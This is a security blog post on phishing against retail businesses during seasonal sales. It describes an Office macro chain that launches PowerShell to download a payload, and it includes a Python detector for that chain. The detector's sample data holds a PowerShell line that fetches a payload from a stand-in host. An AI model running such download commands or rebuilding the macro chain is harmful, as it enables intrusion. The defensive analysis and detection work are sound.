
Phishing Attacks in Retail Business Act Like a Bumper Sale for Attackers

Published By Kumar Raj
Approved By Aswin Vijayan
Published On November 16th, 2018

This post familiarizes readers with the phishing attacks carried out worldwide when retailers run seasonal sales. This period is a big opportunity for attackers to attempt data breaches against the targeted industry.

When a seasonal sale starts, an organization’s main focus is on handling the crowd arriving at its product-selling website. It forgets about the security of the information held in its enterprise cloud, and protection loosens as a result. In simple words, the retail business’s focus is diverted toward the sale instead of staying on its security measures. This kind of scenario results in leakage of data that is stored carelessly in the cloud. The end of a shopping festival or seasonal sale is a moneymaking period for phishing attackers, because employees are concentrating on giving their online customers good service. Retail businesses face several challenges when they have to meet clients’ demands on time. According to a survey from a well-known research laboratory, phishing emails are being created with the purpose of targeting retail businesses. The message content is designed so cleverly that it tempts even intelligent warehouse managers. Managers are not the only ones in the attackers’ sights: other entities that are directly or indirectly connected with large retail enterprises are also targets for intruders.

Purpose of Attack Vector in Phishing Attacks

The means through which hackers gain access to the targeted enterprise’s network server is known as an attack vector. A successful attempt lets them cause a malicious outcome. The attack vector enables online attackers to weaken control over the system, including the human element. In phishing attacks, this vector comes in the form of emails with suspicious attachments.

A Microsoft XLS, XLSX, DOC, or DOCX file containing macro code is used as a weapon by attaching it to an email. Through file collaboration settings, email attachments get synced to the targeted business’s online storage. These storage platforms can be anything, such as SaaS applications or third-party apps. The recipient feels compelled to open these attachments because they look just like any others. Attackers design them so smartly that a normal user cannot determine whether an attachment is suspicious or not.

The steady rise in the graph of phishing attacks is named CloudPhishing fanout. The pie chart attached to this post shows the common enterprise cloud products where CloudPhishing is a big cloud computing security challenge. Applications that are integrated with email software are more likely to be impacted. For example, G Suite and MS OneDrive integrate seamlessly with their respective email clients, and hence files get synced to all end users. Here, the users are those who have rights to work with the synced drive folders.

Deep Analysis of Malicious Documents

Phishing attackers rely on a common scenario in which MS Office files are embedded with macros. When an individual opens such a file by clicking on it, it prompts for the edit option. The MS Excel file is observed to include a workbook_open() function, which runs the macro code when the document is opened. The macro code is heavily obfuscated across subroutines and includes declarations of lengthy variables. All of these functions are called from workbook_open(). After deobfuscation, the Visual Basic code opens a command window, which in turn invokes PowerShell.

When the PowerShell window launches, the cmdlet starts downloading the payload from an SSL site (https://lambda[.]sx). This site appears to be an internet server written in the Go programming language. The malicious content of the document cannot be linked to anything, whether the web server or its owner. We assume that the website was hacked to host the malicious code. Payloads have been observed being served from well-known cloud services and from some compromised web servers.
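The chain described above (an Office application opening a command window that then starts PowerShell to fetch a payload) can be looked for in process-creation telemetry such as Sysmon Event ID 1 or EDR logs. The following Python is an added example, not code from the original post; the event field names, the sample events and the payload.example URL are constructed for illustration.

```python
import re

OFFICE = {"excel.exe", "winword.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Command-line hints that PowerShell is fetching something from the network.
DOWNLOAD_RE = re.compile(
    r"downloadfile|downloadstring|invoke-webrequest|start-bitstransfer|https?://", re.I)

# Constructed process-creation events (hypothetical field names, not real telemetry).
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": "explorer.exe", "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": "EXCEL.EXE", "cmd": "EXCEL.EXE invoice.xls"},
    {"pid": 210, "ppid": 200, "image": "cmd.exe", "cmd": "cmd.exe /c powershell ..."},
    {"pid": 220, "ppid": 210, "image": "powershell.exe",
     "cmd": "powershell Invoke-WebRequest https://payload.example/p -OutFile p"},
    {"pid": 300, "ppid": 100, "image": "powershell.exe", "cmd": "powershell Get-ChildItem"},
    {"pid": 400, "ppid": 100, "image": "WINWORD.EXE", "cmd": "WINWORD.EXE report.docx"},
]

def ancestry(event, by_pid, limit=8):
    """Lowercased image names from this process up through its known ancestors."""
    chain, seen = [], set()
    while event and event["pid"] not in seen and len(chain) < limit:
        seen.add(event["pid"])          # guards against loops from PID reuse
        chain.append(event["image"].lower())
        event = by_pid.get(event["ppid"])
    return chain

def find_macro_chains(events):
    """Alert on every PowerShell process that has an Office application as an ancestor."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        if e["image"].lower() not in POWERSHELL:
            continue
        chain = ancestry(e, by_pid)
        office = next((img for img in chain[1:] if img in OFFICE), None)
        if office is None:
            continue                    # PowerShell started by something else, e.g. a user
        upto = chain.index(office)
        alerts.append({
            "pid": e["pid"],
            "chain": " -> ".join(reversed(chain[:upto + 1])),
            "via_cmd": "cmd.exe" in chain[1:upto],
            "downloads": bool(DOWNLOAD_RE.search(e["cmd"])),
        })
    return alerts

if __name__ == "__main__":
    for alert in find_macro_chains(SAMPLE_EVENTS):
        print(alert)
```

In real telemetry PIDs are reused over time, so the parent lookup should also key on host and process start time (or a process GUID where the log source provides one).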

Adopt Preventive Measures On Time Instead of Ignoring Them

People all around the world who use email communication for one reason or another have to adopt best email security practices. They should never open attachments in emails received from an unknown sender. Consider only the emails that you receive from a well-known sender; keep the rest aside or simply delete them. If you find something suspicious in your email account, contact the administrator immediately without wasting a single second. Use of personal email IDs or social media accounts should be strictly prohibited on premises. This will prevent sharing of confidential business information with unknown external entities. Remember one thing: ‘security from phishing attacks is successful only when employees in an office are trained regarding the same’. Implementation of a CASB solution or CSP security settings is incomplete unless users also take preventive measures. To date, there is no machine that can prevent cyber attacks caused by silly human errors. So, it’s time to be active while working on the cloud; otherwise things can get out of your hands in no time!